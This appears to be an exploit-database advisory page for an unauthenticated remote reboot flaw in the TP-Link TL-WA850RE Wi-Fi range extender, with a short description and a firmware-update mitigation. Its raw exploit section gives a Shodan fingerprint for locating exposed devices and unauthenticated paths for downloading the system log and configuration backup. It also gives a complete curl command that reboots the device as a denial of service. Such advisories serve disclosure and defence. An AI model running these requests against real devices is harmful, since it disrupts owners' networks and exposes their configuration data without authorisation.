TP-Link Technologies TL-WA850RE Wi-Fi Range Extender | Unauthorized Remote Reboot

vendor:

TL-WA850RE Wi-Fi Range Extender

by:

Wadeek

8.8

CVSS

HIGH

Unauthorized Remote Reboot

287

CWE

Product Name: TL-WA850RE Wi-Fi Range Extender

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: h:tp-link:tl-wa850re

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: N/A

2018

TP-Link Technologies TL-WA850RE Wi-Fi Range Extender | Unauthorized Remote Reboot

A vulnerability in TP-Link Technologies TL-WA850RE Wi-Fi Range Extender allows an unauthenticated attacker to remotely reboot the device. The vulnerability exists due to the lack of authentication for the /data/reboot.json endpoint. An attacker can send a specially crafted HTTP request to the vulnerable endpoint to reboot the device.

Mitigation:

The vendor has released a firmware update to address this vulnerability. Users should update their devices to the latest version of the firmware.

Source

Exploit-DB raw data:

# Exploit Title: TP-Link Technologies TL-WA850RE Wi-Fi Range Extender | Unauthorized Remote Reboot
# Date: 25/04/2018
# Exploit Author: Wadeek
# Vendor Homepage: https://www.tp-link.com/
# Firmware Link: https://www.tp-link.com/en/download/TL-WA850RE.html
# Category: dos

1. www.shodan.io (with title "Opening...")

"HTTP/1.1 200 OK" "Server: TP-LINK HTTPD/1.0" "COOKIE="

2. Proof of Concept


:System Log:
/data/systemlog.txt?operation=save

:Encrypted Configuration File:
/data/config.bin?operation=backup

:Reboot:
curl --silent 'http://[IP]/data/reboot.json' -H 'Host: [IP]' -H 'Accept: application/json, text/javascript, */*;' --compressed -H 'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H 'X-Requested-With: XMLHttpRequest' -H 'Cookie: COOKIE=' -H 'Connection: keep-alive' --data 'operation=write'